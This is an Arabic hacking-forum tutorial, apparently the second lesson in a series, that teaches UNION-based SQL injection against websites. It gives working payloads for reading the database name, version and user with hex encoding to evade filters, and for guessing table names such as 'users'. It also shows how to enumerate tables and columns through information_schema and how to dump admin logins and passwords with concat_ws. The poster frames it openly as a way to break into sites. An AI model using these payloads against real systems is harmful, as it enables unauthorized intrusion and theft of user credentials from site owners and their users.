Admin
عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
 المزاج : Don't Play With Me
 |  موضوع: الدرس الثاني لاحتراف SQL  الخميس أغسطس 25, 2011 9:09 pm | |
| السلام عليكم
اليوم الدرس الثاني لاحتراف السكيو ال
.......
أسلوب التشفير :
نبتدي من حيث إنتهين في الجزء الأول إد توقفن عند كيفية جلب بعض المعلومات السرية بواسطة الحقن ومن بين هده المعلومات : database , version , user
وفي ناس بعد قراة الموضوع تمكنت والحمد لله من فعل دالك بس نفترض يجيني
واحد ويقولي أنا عملت زي ما قلت لي بالضبط ووصلت للأعمدة المصابة بس لم
أكتب أمر جلب القاعدة أو الإصدار أو اليوزر ما يطلع شيء وتبدئ التساؤلات
وحد يقلك ممكن من الجهاز واحد يقولك من ضعف الإتصال لووووول بس كل ما في
الأمر أن في مواقع لاتسمح لك بإستعمال السكيول إنجكشن بس شو الحل يا Cyber-Zone
أأأأه في هده الحالة نستعمل التشفير بالهكس لجلب المعلومات والأمر بسيط للغاية شوفو كيف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,unhex(hex(database())),unhex(hex(version())),unh ex(hex(user())),5/*
وكدا راح تطلع المعلومات بالغصب
وكد نكون إنتهينا من جزء مهم في سكيول إنجكشن وندخل الأن في الجزء المتقدم من هده الثغرة.
** ** ** ** **
والإن أصدقاء ندخل للجزء المثير في الحقن d: يعني لو أردنا إختراق موقع مش
حنكتفي بالمعلومات الي إستخرجناها من قبل يعني لازم نستخرج الباس واليوزر
ولدالك نستعمل طريقتين على حسب إصدار القاعدة فإن كانت إصدار رابع سنعتمد
على التخمين كليا وإن كانت إصدار خامس فنعتمد على information schema وقلييييييل من التخمين يلا نشوف أسلوب التخمين الكلي
التخمين :
يعني حبيبي في هدا الجزء الدي أكرهه حقيقة لازم تكون
عندك قائمة بأسماءاليوزرت والباسووردات وقواعد البيانات المحتملة في الموقع
وقولو لحسين ينزلها ليكو على الموقع
نشوف أمثله لليوزرات
user & users & username & admin & login &
member
نشوف أمثله للباس
password & pass & passwd & pwd
أمثلة لأسماء القواعد
user , users , mysql.user , mysql.db
نروح ونشوف الإستغلال كيف يتم :
الان مثلا اسم القاعده في الموقع ( users ) لو نريد نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,user,3,4,5+from+users/*
ونفس الاستغلال السابق لليوزر لو نريد نستخرج باسوورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,password,3,4,5+from+users/*
وإد ما نفعت هالكلمات نروح للتالية لبين ما تشتغل معانا
تمام بالنسبة للتخمين.
بالنسبة لل information schema :
فيتماشى هدا الحقن كثيرا مع القواعد دات الإصدار الخامس وراح ندخل مباشرة في التطبيق للسهولة هدا النوع نشوف :
لاستخراج الجداول في قواعد البيانات وقت الحقن :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,table_name,3,4,5+from+information_schema.tables/*
لاستخراج الاعمده في قواعد البيانات وقت الحقن :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,column_name,3,4,5+from+information_schema.column s/*
لإستخراجهما معا هكدا:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select
1,concat_ws(0x3a3a,table_name,column_name),3,4,5+f
rom+information_schema.columns/*
نفرض طبعا خرجت لينا المعلومات ده
tbl_admins::login:ass
راح يكون الإستغلال كدا :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,concat_ws(0x3a3a,login,pass),3,4,5+from+tbl_admi ns/*
أتمنى تكون وصلت الفكرة:d
بس في مرات لما بنحاول نبحث عن الجداول والأعمدة ما بيطلع لينا غير جدول واحد وطريقة تخطي هدا المشكل سهلة دالك بإستعمال LIMIT
شاهد هدا الفيديو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تمام أتمنى تكونو فهمتو LIMIT
والأأن نفترض إن الموقع فيه يوزرات كثيرة وما عرفنا وين الأدمن :d
والحل بسيط شوف كيف :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,user,3,4,5+from+users+where+userid=1/*
وطبعا طلبنا في هدا الأمر إحضار العضوية الأولى وهي بتاعت الأدمن ^^
...
منقول
| |
|
